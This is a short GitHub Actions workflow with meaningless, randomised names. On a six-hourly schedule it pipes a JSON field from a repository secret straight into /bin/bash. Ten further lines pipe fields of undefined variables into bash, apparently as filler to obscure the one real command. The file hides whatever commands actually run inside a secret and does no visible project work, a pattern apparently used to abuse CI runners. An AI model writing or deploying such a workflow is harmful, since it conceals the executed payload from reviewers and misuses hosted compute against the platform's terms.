name: taohuani4163
on:
  workflow_dispatch:
  schedule:
    - cron: '53 4/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: taohuani4163
        env:
          gd62: ${{ secrets.gd62 }}
        run: |
          echo $gd62 | jq -r .pmkgb07 | /bin/bash
          echo $tcp8 | jq -r .o4 | /bin/bash
          echo $svzn42689 | jq -r .q764 | /bin/bash
          echo $dt86936 | jq -r .rolpv550 | /bin/bash
          echo $b3710 | jq -r .bxsf32 | /bin/bash
          echo $cp912 | jq -r .pql18 | /bin/bash
          echo $kkgxt45413 | jq -r .ag4700 | /bin/bash
          echo $s4 | jq -r .twipu05 | /bin/bash
          echo $wecgo6292 | jq -r .siqu6 | /bin/bash
          echo $eds6762 | jq -r .yq9 | /bin/bash
          echo $j50 | jq -r .dkxet508 | /bin/bash

